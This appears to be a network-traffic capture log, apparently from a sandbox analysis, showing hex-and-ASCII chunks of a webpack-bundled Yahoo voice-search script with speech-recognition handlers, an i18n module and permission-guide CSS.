                                                                                                                                                                        2023-06-02 11:13:21 UTC447INData Raw: 20 20 20 7d 5c 6e 5c 6e 20 20 20 20 20 20 73 65 6c 66 2e 72 65 63 6f 67 6e 69 74 69 6f 6e 2e 67 72 61 6d 6d 61 72 73 20 3d 20 73 70 65 65 63 68 52 65 63 6f 67 6e 69 74 69 6f 6e 4c 69 73 74 3b 5c 6e 20 20 20 20 20 20 73 65 6c 66 2e 72 65 63 6f 67 6e 69 74 69 6f 6e 2e 63 6f 6e 74 69 6e 75 6f 75 73 20 3d 20 66 61 6c 73 65 3b 5c 6e 20 20 20 20 20 20 73 65 6c 66 2e 72 65 63 6f 67 6e 69 74 69 6f 6e 2e 6c 61 6e 67 20 3d 20 73 65 6c 66 2e 63 6f 6e 66 69 67 2e 73 70 65 65 63 68 4c 61 6e 67 3b 5c 6e 20 20 20 20 20 20 73 65 6c 66 2e 72 65 63 6f 67 6e 69 74 69 6f 6e 2e 69 6e 74 65 72 69 6d 52 65 73 75 6c 74 73 20 3d 20 66 61 6c 73 65 3b 5c 6e 20 20 20 20 20 20 73 65 6c 66 2e 72 65 63 6f 67 6e 69 74 69 6f 6e 2e 6d 61 78 41 6c 74 65 72 6e 61 74 69 76 65 73 20 3d 20 31
                                                                                                                                                                        Data Ascii: }\n\n self.recognition.grammars = speechRecognitionList;\n self.recognition.continuous = false;\n self.recognition.lang = self.config.speechLang;\n self.recognition.interimResults = false;\n self.recognition.maxAlternatives = 1
                                                                                                                                                                        2023-06-02 11:13:21 UTC448INData Raw: 20 20 20 7d 3b 5c 6e 20 20 20 20 20 20 7d 5c 6e 5c 6e 20 20 20 20 20 20 69 66 20 28 73 65 6c 66 2e 72 65 74 72 79 4c 69 6e 6b 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 73 65 6c 66 2e 72 65 74 72 79 4c 69 6e 6b 2e 6f 6e 63 6c 69 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 73 65 6c 66 2e 69 73 52 65 63 6f 67 6e 69 74 69 6f 6e 53 74 61 72 74 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 73 65 6c 66 2e 72 65 63 6f 67 6e 69 74 69 6f 6e 2e 73 74 61 72 74 28 29 3b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 73 65 6c 66 2e 73 65 6e 64 42 65 61 63 6f 6e 28 27 63 6c 6b 27 2c 20 27 76 6f 69 63 65 73 65 61 72 63 68 5f 70 61 6e 65 6c 5f 72 65 74 72 79 27 29 3b 5c 6e 20 20 20 20 20 20 20 20 20 20 7d 5c 6e 20
                                                                                                                                                                        Data Ascii: };\n }\n\n if (self.retryLink) {\n self.retryLink.onclick = function () {\n if (!self.isRecognitionStart) {\n self.recognition.start();\n self.sendBeacon('clk', 'voicesearch_panel_retry');\n }\n
                                                                                                                                                                        2023-06-02 11:13:21 UTC449INData Raw: 74 5c 6e 20 20 20 20 20 20 20 20 2f 2f 20 54 68 65 20 53 70 65 65 63 68 52 65 63 6f 67 6e 69 74 69 6f 6e 52 65 73 75 6c 74 4c 69 73 74 20 6f 62 6a 65 63 74 20 63 6f 6e 74 61 69 6e 73 20 53 70 65 65 63 68 52 65 63 6f 67 6e 69 74 69 6f 6e 52 65 73 75 6c 74 20 6f 62 6a 65 63 74 73 2e 5c 6e 20 20 20 20 20 20 20 20 2f 2f 20 49 74 20 68 61 73 20 61 20 67 65 74 74 65 72 20 73 6f 20 69 74 20 63 61 6e 20 62 65 20 61 63 63 65 73 73 65 64 20 6c 69 6b 65 20 61 6e 20 61 72 72 61 79 5c 6e 20 20 20 20 20 20 20 20 2f 2f 20 54 68 65 20 66 69 72 73 74 20 5b 30 5d 20 72 65 74 75 72 6e 73 20 74 68 65 20 53 70 65 65 63 68 52 65 63 6f 67 6e 69 74 69 6f 6e 52 65 73 75 6c 74 20 61 74 20 74 68 65 20 6c 61 73 74 20 70 6f 73 69 74 69 6f 6e 2e 5c 6e 20 20 20 20 20 20 20 20 2f 2f 20
                                                                                                                                                                        Data Ascii: t\n // The SpeechRecognitionResultList object contains SpeechRecognitionResult objects.\n // It has a getter so it can be accessed like an array\n // The first [0] returns the SpeechRecognitionResult at the last position.\n //
                                                                                                                                                                        2023-06-02 11:13:21 UTC451INData Raw: 28 5c 22 73 32 74 62 2d 68 5c 22 29 3b 5c 6e 20 20 20 20 20 20 20 20 20 20 7d 5c 6e 5c 6e 20 20 20 20 20 20 20 20 20 20 73 65 6c 66 2e 68 69 64 65 52 65 74 72 79 4c 69 6e 6b 28 73 65 6c 66 29 3b 5c 6e 5c 6e 20 20 20 20 20 20 20 20 20 20 69 66 20 28 73 65 6c 66 2e 73 65 61 72 63 68 42 6f 78 46 6f 72 6d 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 6e 70 75 74 46 72 20 3d 20 73 65 6c 66 2e 73 65 61 72 63 68 42 6f 78 46 6f 72 6d 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 5b 6e 61 6d 65 3d 66 72 5d 27 29 3b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 6e 70 75 74 46 72 32 20 3d 20 73 65 6c 66 2e 73 65 61 72 63 68 42 6f 78 46 6f 72 6d 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 5b 6e 61 6d 65 3d 66 72 32 5d 27 29 3b 5c
                                                                                                                                                                        Data Ascii: (\"s2tb-h\");\n }\n\n self.hideRetryLink(self);\n\n if (self.searchBoxForm) {\n var inputFr = self.searchBoxForm.querySelector('[name=fr]');\n var inputFr2 = self.searchBoxForm.querySelector('[name=fr2]');\
                                                                                                                                                                        2023-06-02 11:13:21 UTC452INData Raw: 20 20 20 20 20 20 20 73 65 6c 66 2e 73 70 65 65 63 68 54 65 78 74 2e 69 6e 6e 65 72 54 65 78 74 20 3d 20 73 65 6c 66 2e 69 31 38 6e 2e 74 28 27 73 65 61 72 63 68 2e 76 6f 69 63 65 2e 72 65 63 6f 67 6e 69 74 69 6f 6e 5f 65 72 72 6f 72 27 29 3b 5c 6e 20 20 20 20 20 20 20 20 7d 5c 6e 5c 6e 20 20 20 20 20 20 20 20 73 65 6c 66 2e 68 69 64 65 54 72 65 6e 64 69 6e 67 28 73 65 6c 66 29 3b 5c 6e 20 20 20 20 20 20 20 20 73 65 6c 66 2e 73 68 6f 77 52 65 74 72 79 4c 69 6e 6b 28 73 65 6c 66 29 3b 5c 6e 20 20 20 20 20 20 20 20 73 65 6c 66 2e 65 72 72 6f 72 41 75 64 69 6f 2e 70 6c 61 79 28 29 3b 5c 6e 20 20 20 20 20 20 7d 3b 5c 6e 5c 6e 20 20 20 20 20 20 73 65 6c 66 2e 72 65 63 6f 67 6e 69 74 69 6f 6e 2e 6f 6e 61 75 64 69 6f 73 74 61 72 74 20 3d 20 66 75 6e 63 74 69 6f
                                                                                                                                                                        Data Ascii: self.speechText.innerText = self.i18n.t('search.voice.recognition_error');\n }\n\n self.hideTrending(self);\n self.showRetryLink(self);\n self.errorAudio.play();\n };\n\n self.recognition.onaudiostart = functio
                                                                                                                                                                        2023-06-02 11:13:21 UTC453INData Raw: 69 72 65 64 20 77 68 65 6e 20 6e 6f 20 73 6f 75 6e 64 20 70 72 65 73 65 6e 74 5c 6e 20 20 20 20 20 20 20 20 69 66 20 28 73 65 6c 66 2e 73 70 65 65 63 68 42 75 74 74 6f 6e 43 6f 6e 74 61 69 6e 65 72 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 73 65 6c 66 2e 73 70 65 65 63 68 42 75 74 74 6f 6e 43 6f 6e 74 61 69 6e 65 72 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 5c 22 73 70 65 61 6b 69 6e 67 5c 22 29 3b 5c 6e 20 20 20 20 20 20 20 20 7d 5c 6e 20 20 20 20 20 20 7d 3b 5c 6e 5c 6e 20 20 20 20 20 20 73 65 6c 66 2e 72 65 63 6f 67 6e 69 74 69 6f 6e 2e 6f 6e 73 74 61 72 74 20 3d 20 66 75 6e 63 74 69 6f 6e 5c 6e 20 20 20 20 20 20 20 20 2f 2a 65 76 65 6e 74 2a 2f 5c 6e 20 20 20 20 20 20 28 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 2f 2f 20 46 69 72 65 64 20
                                                                                                                                                                        Data Ascii: ired when no sound present\n if (self.speechButtonContainer) {\n self.speechButtonContainer.classList.remove(\"speaking\");\n }\n };\n\n self.recognition.onstart = function\n /*event*/\n () {\n // Fired
                                                                                                                                                                        2023-06-02 11:13:21 UTC453INData Raw: 63 68 20 72 65 63 6f 67 6e 69 74 69 6f 6e 20 73 65 72 76 69 63 65 20 68 61 73 20 62 65 67 75 6e 20 6c 69 73 74 65 6e 69 6e 67 5c 6e 20 20 20 20 20 20 20 20 73 65 6c 66 2e 72 65 63 6f 67 6e 69 74 69 6f 6e 49 6e 69 74 28 73 65 6c 66 29 3b 5c 6e 20 20 20 20 20 20 20 20 73 65 6c 66 2e 73 74 61 72 74 52 65 63 6f 67 6e 69 74 69 6f 6e 28 73 65 6c 66 29 3b 5c 6e 20 20 20 20 20 20 7d 3b 5c 6e 5c 6e 20 20 20 20 20 20 73 65 6c 66 2e 72 65 63 6f 67 6e 69 74 69 6f 6e 2e 6f 6e 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 5c 6e 20 20 20 20 20 20 20 20 2f 2a 65 76 65 6e 74 2a 2f 5c 6e 20 20 20 20 20 20 28 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 2f 2f 20 46 69 72 65 64 20 77 68 65 6e 20 74 68 65 20 73 70 65 65 63 68 20 72 65 63 6f 67 6e 69 74 69 6f 6e 20 73 65 72 76 69 63 65
                                                                                                                                                                        Data Ascii: ch recognition service has begun listening\n self.recognitionInit(self);\n self.startRecognition(self);\n };\n\n self.recognition.onend = function\n /*event*/\n () {\n // Fired when the speech recognition service
                                                                                                                                                                        2023-06-02 11:13:21 UTC455INData Raw: 63 72 6f 70 68 6f 6e 65 5c 5c 5c 22 3e 5c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 5c 5c 5c 22 73 70 72 69 74 65 5c 5c 5c 22 3e 3c 2f 64 69 76 3e 5c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 5c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 5c 5c 5c 22 67 75 69 64 65 2d 74 65 78 74 5c 5c 5c 22 3e 5c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 5c 5c 5c 22 74 69 74 6c 65 5c 5c 5c 22 3e 5c 22 2e 63 6f 6e 63 61 74 28 73 65 6c 66 2e 69 31 38 6e 2e 74 28 27 73 65 61 72 63 68 2e 76 6f 69 63 65 2e 70 65 72 6d 69 73 73 69 6f 6e 5f 74 69
                                                                                                                                                                        Data Ascii: crophone\\\">\\n <div class=\\\"sprite\\\"></div>\\n </div>\\n <div class=\\\"guide-text\\\">\\n <div class=\\\"title\\\">\".concat(self.i18n.t('search.voice.permission_ti
                                                                                                                                                                        2023-06-02 11:13:21 UTC456INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 5c 5c 5c 22 72 69 70 70 6c 65 5c 5c 5c 22 3e 3c 2f 73 70 61 6e 3e 5c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 5c 5c 5c 22 72 69 70 70 6c 65 5c 5c 5c 22 3e 3c 2f 73 70 61 6e 3e 5c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 5c 5c 5c 22 72 69 70 70 6c 65 5c 5c 5c 22 3e 3c 2f 73 70 61 6e 3e 5c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 5c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 5c
                                                                                                                                                                        Data Ascii: <span class=\\\"ripple\\\"></span>\\n <span class=\\\"ripple\\\"></span>\\n <span class=\\\"ripple\\\"></span>\\n </div>\\n <div class=\
                                                                                                                                                                        2023-06-02 11:13:21 UTC457INData Raw: 63 6f 6e 66 69 67 2e 75 69 2e 73 70 65 65 63 68 4f 76 65 72 6c 61 79 20 26 26 20 73 65 6c 66 2e 63 6f 6e 66 69 67 2e 75 69 2e 73 70 65 65 63 68 4f 76 65 72 6c 61 79 2e 64 69 73 61 62 6c 65 42 6c 75 72 29 20 7b 5c 6e 20 20 20 20 20 20 64 6f 6d 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 5b 30 5d 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 27 64 69 73 61 62 6c 65 2d 62 6c 75 72 2d 6f 76 65 72 6c 61 79 27 29 3b 5c 6e 20 20 20 20 7d 5c 6e 5c 6e 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 6f 6d 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 5b 30 5d 29 3b 5c 6e 20 20 7d 3b 5c 6e 5c 6e 20 20 56 6f 69 63 65 53 65 61 72 63 68 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 42 72 6f 77 73 65 72 53 75 70 70 6f 72 74 65 64 20 3d 20
                                                                                                                                                                        Data Ascii: config.ui.speechOverlay && self.config.ui.speechOverlay.disableBlur) {\n dom.body.children[0].classList.add('disable-blur-overlay');\n }\n\n document.body.appendChild(dom.body.children[0]);\n };\n\n VoiceSearch.prototype.isBrowserSupported =
                                                                                                                                                                        2023-06-02 11:13:21 UTC458INData Raw: 3a 20 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 42 72 6f 77 73 65 72 28 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 69 73 43 68 72 6f 6d 69 75 6d 20 26 26 20 69 73 45 64 67 65 20 26 26 20 21 69 73 4c 65 67 61 63 79 45 64 67 65 3b 5c 6e 20 20 20 20 20 20 7d 2c 5c 6e 20 20 20 20 20 20 63 68 65 63 6b 41 50 49 3a 20 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 41 50 49 28 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 77 69 6e 20 26 26 20 28 27 53 70 65 65 63 68 52 65 63 6f 67 6e 69 74 69 6f 6e 27 20 69 6e 20 77 69 6e 20 7c 7c 20 27 77 65 62 6b 69 74 53 70 65 65 63 68 52 65 63 6f 67 6e 69 74 69 6f 6e 27 20 69 6e 20 77 69 6e 29 20 26 26 20 28 27 53 70 65 65 63 68 47 72 61 6d 6d 61 72 4c 69 73 74 27 20 69 6e 20 77 69 6e 20 7c 7c 20 27
                                                                                                                                                                        Data Ascii: : function checkBrowser() {\n return isChromium && isEdge && !isLegacyEdge;\n },\n checkAPI: function checkAPI() {\n return win && ('SpeechRecognition' in win || 'webkitSpeechRecognition' in win) && ('SpeechGrammarList' in win || '
                                                                                                                                                                        2023-06-02 11:13:21 UTC460INData Raw: 73 5c 6e 20 20 20 20 69 66 20 28 21 73 65 6c 66 2e 63 6f 6e 66 69 67 2e 65 6e 61 62 6c 65 5f 76 6f 69 63 65 5f 74 72 65 6e 64 69 6e 67 20 7c 7c 20 21 73 65 6c 66 2e 74 72 65 6e 64 69 6e 67 29 20 7b 5c 6e 20 20 20 20 20 20 72 65 74 75 72 6e 3b 5c 6e 20 20 20 20 7d 5c 6e 5c 6e 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 5c 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 73 65 61 72 63 68 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 64 61 74 61 2f 76 33 2f 73 65 61 72 63 68 3f 61 70 70 69 64 3d 34 64 32 33 34 61 39 64 26 6d 61 72 6b 65 74 3d 5c 22 20 2b 20 73 65 6c 66 2e 63 6f 6e 66 69 67 2e 74 72 65 6e 64 69 6e 67 2e 6d 61 72 6b 65 74 20 2b 20 5c 22 26 66 65 61 74 75 72 65 73 3d 74 72 65 6e 64 69 6e 67 2e 76 6f 69 63 65 5c 22 3b 5c 6e 20 20 20 20 73 65 6c 66 2e 61 6a 61 78 52 65
                                                                                                                                                                        Data Ascii: s\n if (!self.config.enable_voice_trending || !self.trending) {\n return;\n }\n\n var url = \"https://api.search.yahoo.com/data/v3/search?appid=4d234a9d&market=\" + self.config.trending.market + \"&features=trending.voice\";\n self.ajaxRe
                                                                                                                                                                        2023-06-02 11:13:21 UTC461INData Raw: 6c 66 29 20 7b 5c 6e 20 20 20 20 69 66 20 28 21 73 65 6c 66 2e 74 72 65 6e 64 69 6e 67 29 20 7b 5c 6e 20 20 20 20 20 20 72 65 74 75 72 6e 3b 5c 6e 20 20 20 20 7d 5c 6e 5c 6e 20 20 20 20 73 65 6c 66 2e 74 72 65 6e 64 69 6e 67 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 5c 22 68 69 64 65 5c 22 29 3b 5c 6e 20 20 7d 3b 5c 6e 5c 6e 20 20 56 6f 69 63 65 53 65 61 72 63 68 2e 70 72 6f 74 6f 74 79 70 65 2e 73 68 6f 77 52 65 74 72 79 4c 69 6e 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 73 65 6c 66 29 20 7b 5c 6e 20 20 20 20 69 66 20 28 73 65 6c 66 2e 72 65 74 72 79 4c 69 6e 6b 29 20 7b 5c 6e 20 20 20 20 20 20 73 65 6c 66 2e 72 65 74 72 79 4c 69 6e 6b 2e 69 6e 6e 65 72 54 65 78 74 20 3d 20 73 65 6c 66 2e 69 31 38 6e 2e 74 28 27 73 65 61 72 63 68 2e 76 6f 69 63 65 2e
                                                                                                                                                                        Data Ascii: lf) {\n if (!self.trending) {\n return;\n }\n\n self.trending.classList.add(\"hide\");\n };\n\n VoiceSearch.prototype.showRetryLink = function (self) {\n if (self.retryLink) {\n self.retryLink.innerText = self.i18n.t('search.voice.
                                                                                                                                                                        2023-06-02 11:13:21 UTC462INData Raw: 20 73 65 6c 66 2e 73 70 65 65 63 68 50 61 6e 65 6c 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 5c 22 73 32 74 62 2d 68 5c 22 29 3b 5c 6e 20 20 20 20 20 20 7d 5c 6e 5c 6e 20 20 20 20 20 20 73 65 6c 66 2e 68 69 64 65 54 72 65 6e 64 69 6e 67 28 73 65 6c 66 29 3b 5c 6e 20 20 20 20 20 20 73 65 6c 66 2e 68 69 64 65 52 65 74 72 79 4c 69 6e 6b 28 73 65 6c 66 29 3b 20 2f 2f 20 63 6c 65 61 6e 20 75 70 20 65 73 63 20 6c 69 73 74 65 6e 65 72 5c 6e 5c 6e 20 20 20 20 20 20 64 6f 63 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 6b 65 79 64 6f 77 6e 27 2c 20 73 65 6c 66 2e 6f 6e 45 73 63 4b 65 79 44 6f 77 6e 29 3b 5c 6e 20 20 20 20 7d 2c 20 31 30 30 29 3b 5c 6e 20 20 7d 3b 5c 6e 5c 6e 20 20 56 6f 69 63 65 53 65 61 72 63 68 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                        Data Ascii: self.speechPanel.classList.add(\"s2tb-h\");\n }\n\n self.hideTrending(self);\n self.hideRetryLink(self); // clean up esc listener\n\n doc.removeEventListener('keydown', self.onEscKeyDown);\n }, 100);\n };\n\n VoiceSearch.prototyp
                                                                                                                                                                        2023-06-02 11:13:21 UTC464INData Raw: 20 20 76 61 72 20 78 64 72 20 3d 20 6e 65 77 20 77 69 6e 2e 58 44 6f 6d 61 69 6e 52 65 71 75 65 73 74 28 29 3b 5c 6e 5c 6e 20 20 20 20 20 20 78 64 72 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 74 72 79 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 72 65 73 70 6f 6e 73 65 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 72 65 73 70 6f 6e 73 65 52 61 77 29 3b 5c 6e 20 20 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 28 72 65 73 70 6f 6e 73 65 29 3b 5c 6e 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 5c 6e 20 20 20 20 20 20 20 20 7d 5c 6e 20 20 20 20 20 20 7d 3b 5c 6e 5c 6e 20 20 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27
                                                                                                                                                                        Data Ascii: var xdr = new win.XDomainRequest();\n\n xdr.onload = function () {\n try {\n response = JSON.parse(responseRaw);\n callback(response);\n } catch (err) {\n return;\n }\n };\n\n xhr.open('GET'
                                                                                                                                                                        2023-06-02 11:13:21 UTC465INData Raw: 2a 2a 2a 2a 2a 2a 2a 2a 21 2a 5c 0a 20 20 21 2a 2a 2a 20 2e 2f 73 72 63 2f 6c 69 62 2f 49 31 38 6e 2e 6a 73 20 2a 2a 2a 21 0a 20 20 5c 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 66 75 6e 63 74 69 6f 6e 28 6d 6f 64 75 6c 65 2c 5f 5f 75 6e 75 73 65 64 5f 77 65 62 70 61 63 6b 5f 65 78 70 6f 72 74 73 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 7b 65 76 61 6c 28 22 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 5c 6e 20 20 76 61 72 20 4c 41 4e 47 5f 4c 49 53 54 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 2f 2a 21 20 2e 2f 6c 61 6e 67 5f 6c 69 73 74 2e 6a 73 6f 6e 20 2a 2f 20 5c 22 2e 2f 73 72 63 2f 6c 69 62 2f 6c 61 6e 67 5f 6c 69 73 74 2e
                                                                                                                                                                        Data Ascii: ********!*\ !*** ./src/lib/I18n.js ***! \*************************/function(module,__unused_webpack_exports,__webpack_require__){eval("module.exports = function () {\n var LANG_LIST = __webpack_require__(/*! ./lang_list.json */ \"./src/lib/lang_list.
                                                                                                                                                                        2023-06-02 11:13:21 UTC466INData Raw: 5d 20 26 26 20 49 31 38 6e 2e 6c 61 6e 67 4d 61 70 5b 74 68 69 73 2e 6c 61 6e 67 5d 5b 69 64 5d 29 3a 5c 6e 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 49 31 38 6e 2e 6c 61 6e 67 4d 61 70 5b 74 68 69 73 2e 6c 61 6e 67 5d 5b 69 64 5d 3b 5c 6e 20 20 20 20 20 20 20 20 2f 2f 20 66 61 6c 6c 62 61 63 6b 20 74 6f 20 64 65 66 61 75 6c 74 20 73 74 72 69 6e 67 73 5c 6e 5c 6e 20 20 20 20 20 20 20 20 63 61 73 65 20 42 6f 6f 6c 65 61 6e 28 49 31 38 6e 2e 6c 61 6e 67 4d 61 70 20 26 26 20 49 31 38 6e 2e 6c 61 6e 67 4d 61 70 5b 44 45 46 41 55 4c 54 5f 4c 41 4e 47 5d 20 26 26 20 49 31 38 6e 2e 6c 61 6e 67 4d 61 70 5b 44 45 46 41 55 4c 54 5f 4c 41 4e 47 5d 5b 69 64 5d 29 3a 5c 6e 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 49 31 38 6e 2e 6c 61 6e 67 4d 61 70
                                                                                                                                                                        Data Ascii: ] && I18n.langMap[this.lang][id]):\n return I18n.langMap[this.lang][id];\n // fallback to default strings\n\n case Boolean(I18n.langMap && I18n.langMap[DEFAULT_LANG] && I18n.langMap[DEFAULT_LANG][id]):\n return I18n.langMap
                                                                                                                                                                        2023-06-02 11:13:21 UTC467INData Raw: 5f 5f 2a 2f 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 28 5f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 63 73 73 5f 6c 6f 61 64 65 72 5f 64 69 73 74 5f 72 75 6e 74 69 6d 65 5f 61 70 69 5f 6a 73 5f 5f 57 45 42 50 41 43 4b 5f 49 4d 50 4f 52 54 45 44 5f 4d 4f 44 55 4c 45 5f 30 5f 5f 29 3b 5c 6e 2f 2f 20 49 6d 70 6f 72 74 73 5c 6e 5c 6e 76 61 72 20 5f 5f 5f 43 53 53 5f 4c 4f 41 44 45 52 5f 45 58 50 4f 52 54 5f 5f 5f 20 3d 20 5f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 63 73 73 5f 6c 6f 61 64 65 72 5f 64 69 73 74 5f 72 75 6e 74 69 6d 65 5f 61 70 69 5f 6a 73 5f 5f 57 45 42 50 41 43 4b 5f 49 4d 50 4f 52 54 45 44 5f 4d 4f 44 55 4c 45 5f 30 5f 5f 5f 64 65 66 61 75 6c 74 28 29 28 66 75 6e 63 74 69 6f 6e 28 69 29 7b 72 65 74 75 72 6e 20 69 5b 31 5d 7d
                                                                                                                                                                        Data Ascii: __*/__webpack_require__.n(_node_modules_css_loader_dist_runtime_api_js__WEBPACK_IMPORTED_MODULE_0__);\n// Imports\n\nvar ___CSS_LOADER_EXPORT___ = _node_modules_css_loader_dist_runtime_api_js__WEBPACK_IMPORTED_MODULE_0___default()(function(i){return i[1]}
                                                                                                                                                                        2023-06-02 11:13:21 UTC469INData Raw: 63 68 70 2e 70 65 72 6d 69 73 73 69 6f 6e 2d 67 75 69 64 65 20 7b 5c 5c 6e 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 5c 5c 6e 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 5c 5c 6e 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 5c 5c 6e 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 2e 39 3b 5c 5c 6e 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 5c 5c 6e 20 20 20 20 6c 65 66 74 3a 20 30 3b 5c 5c 6e 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 5c 5c 6e 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 5c 5c 6e 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 5c 5c 6e 20 20 20 20 74 6f 70 3a 20 30 3b 5c 5c 6e 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 30 30 3b 5c 5c 6e 20
                                                                                                                                                                        Data Ascii: chp.permission-guide {\\n height: 100%;\\n width: 100%;\\n padding: 0;\\n opacity: 0.9;\\n background-color: #fff;\\n left: 0;\\n overflow: hidden;\\n position: fixed;\\n text-align: left;\\n top: 0;\\n z-index: 10000;\\n
                                                                                                                                                                        2023-06-02 11:13:21 UTC470INData Raw: 67 69 6e 2d 6c 65 66 74 3a 20 32 34 70 78 3b 5c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 5c 5c 6e 20 20 20 20 20 20 20 20 7d 5c 5c 6e 23 73 70 63 68 70 2e 70 65 72 6d 69 73 73 69 6f 6e 2d 67 75 69 64 65 20 2e 67 75 69 64 65 20 2e 67 75 69 64 65 2d 74 65 78 74 20 2e 74 69 74 6c 65 20 7b 5c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 33 32 61 33 31 3b 5c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 32 70 78 3b 5c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 4e 65 75 65 2d 42 6f 6c 64 3b 5c 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69
                                                                                                                                                                        Data Ascii: gin-left: 24px;\\n float: left;\\n }\\n#spchp.permission-guide .guide .guide-text .title {\\n color: #232a31;\\n font-size: 32px;\\n font-family: HelveticaNeue-Bold;\\n line-hei
